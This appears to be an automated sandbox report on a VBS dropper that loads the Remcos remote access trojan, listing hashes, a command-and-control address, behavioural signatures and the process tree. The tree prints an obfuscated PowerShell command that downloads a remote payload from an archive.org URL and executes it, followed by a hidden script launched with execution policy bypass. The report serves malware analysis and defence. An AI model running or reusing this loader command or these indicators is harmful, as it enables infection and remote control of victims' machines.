Analysis
-
max time kernel
152s -
max time network
155s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
21-04-2021 13:20
Static task
static1
Behavioral task
behavioral1
Sample
Appraisa.vbs
Resource
win7v20210408
General
-
Target
Appraisa.vbs
-
Size
662B
-
MD5
2e95d045ff86903502b52f5fd0976aad
-
SHA1
c74e479ff249f1e8c248b8a67e318a61b1f1d5e4
-
SHA256
dae93e987a854255ff55ce9f62729f17f57d3f8a56933a57cb8de89b698e81f0
-
SHA512
0427fa613d91d41c98dfb7d9a964c74857813959f427eb060a1a39c2cf289235aaa0aec6015cea8d7bd16da1e14bae3ba88c998780d33ea6faf9d0b8102264df
Malware Config
Extracted
remcos
194.5.97.183:8888
Signatures
-
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid process 6 1220 powershell.exe 8 1220 powershell.exe 10 1220 powershell.exe 12 1220 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1060 set thread context of 816 1060 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 1220 powershell.exe 1220 powershell.exe 1060 powershell.exe 1060 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1220 powershell.exe Token: SeDebugPrivilege 1060 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
aspnet_compiler.exepid process 816 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 19 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 1996 wrote to memory of 1220 1996 WScript.exe powershell.exe PID 1996 wrote to memory of 1220 1996 WScript.exe powershell.exe PID 1996 wrote to memory of 1220 1996 WScript.exe powershell.exe PID 1220 wrote to memory of 1060 1220 powershell.exe powershell.exe PID 1220 wrote to memory of 1060 1220 powershell.exe powershell.exe PID 1220 wrote to memory of 1060 1220 powershell.exe powershell.exe PID 1060 wrote to memory of 816 1060 powershell.exe aspnet_compiler.exe PID 1060 wrote to memory of 816 1060 powershell.exe aspnet_compiler.exe PID 1060 wrote to memory of 816 1060 powershell.exe aspnet_compiler.exe PID 1060 wrote to memory of 816 1060 powershell.exe aspnet_compiler.exe PID 1060 wrote to memory of 816 1060 powershell.exe aspnet_compiler.exe PID 1060 wrote to memory of 816 1060 powershell.exe aspnet_compiler.exe PID 1060 wrote to memory of 816 1060 powershell.exe aspnet_compiler.exe PID 1060 wrote to memory of 816 1060 powershell.exe aspnet_compiler.exe PID 1060 wrote to memory of 816 1060 powershell.exe aspnet_compiler.exe PID 1060 wrote to memory of 816 1060 powershell.exe aspnet_compiler.exe PID 1060 wrote to memory of 816 1060 powershell.exe aspnet_compiler.exe PID 1060 wrote to memory of 816 1060 powershell.exe aspnet_compiler.exe PID 1060 wrote to memory of 816 1060 powershell.exe aspnet_compiler.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Appraisa.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601509.us.archive.org/35/items/all_20210420_20210420_1440/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file "C:\Users\Public\ Microsoft.ps1"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
4ff6b3014913b3061196d6fb28246928
SHA1720504ad8a352f0451e65e93782c5b13e703724e
SHA256ed1689551a0c6f83161b7541e8026dee76f7efe3abe83f970f1bddcbad7a22f6
SHA512b63183e88eddaa83caedde4f60619b74c50a7abd294d63347ff5052d35fb8320f66c607bf91c05766fd3aa0f9d00cac84e64a8d7e39ce88aab7720a224d27b5c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
10479ae2f624cc587efe1b5466dca98b
SHA1c82509ea15f7cfbfc2a01e278567827f7d6baff3
SHA256a9d4b00114fa4925fb755e98c6434a0d095c4aad2be3de20ded01834eedcd983
SHA5124626e859f8704e73c988fc551c25bc628856297a2d19cf8393aa94e0f9e02c84a97abb907b2138d16ab8758b01ffbe80aefc065173ed3a068d5acb18cdb9e5b1
-
C:\Users\Public\ Microsoft.ps1MD5
eda0264cc0baa7804ce2a32a99aa9b98
SHA1274b4d04e802370cac624649ea30149dded4e053
SHA256950cc79c3173d2a1ad76a7b8e64c9100ca929caf0201396758380ff2d712680f
SHA51243f6dd07e297c157f54147aa34512b4812f2650f990865c81181e14d379bf12352fcc3c2d20fbfb535d8bf2a3b5ebc7ab6aa0cd47ab498f0d1f5818e41bf9a74
-
memory/816-87-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/816-86-0x00000000767B1000-0x00000000767B3000-memory.dmpFilesize
8KB
-
memory/816-85-0x000000000042EEEF-mapping.dmp
-
memory/816-84-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/1060-71-0x0000000000000000-mapping.dmp
-
memory/1060-77-0x000000001ACF0000-0x000000001ACF2000-memory.dmpFilesize
8KB
-
memory/1060-83-0x00000000027A0000-0x00000000027B8000-memory.dmpFilesize
96KB
-
memory/1060-78-0x000000001ACF4000-0x000000001ACF6000-memory.dmpFilesize
8KB
-
memory/1220-67-0x000000001AC54000-0x000000001AC56000-memory.dmpFilesize
8KB
-
memory/1220-68-0x00000000022C0000-0x00000000022C1000-memory.dmpFilesize
4KB
-
memory/1220-69-0x000000001AB80000-0x000000001AB81000-memory.dmpFilesize
4KB
-
memory/1220-66-0x000000001AC50000-0x000000001AC52000-memory.dmpFilesize
8KB
-
memory/1220-70-0x000000001C8B0000-0x000000001C8B1000-memory.dmpFilesize
4KB
-
memory/1220-65-0x0000000002560000-0x0000000002561000-memory.dmpFilesize
4KB
-
memory/1220-64-0x000000001ACD0000-0x000000001ACD1000-memory.dmpFilesize
4KB
-
memory/1220-63-0x0000000002280000-0x0000000002281000-memory.dmpFilesize
4KB
-
memory/1220-61-0x0000000000000000-mapping.dmp
-
memory/1996-60-0x000007FEFC051000-0x000007FEFC053000-memory.dmpFilesize
8KB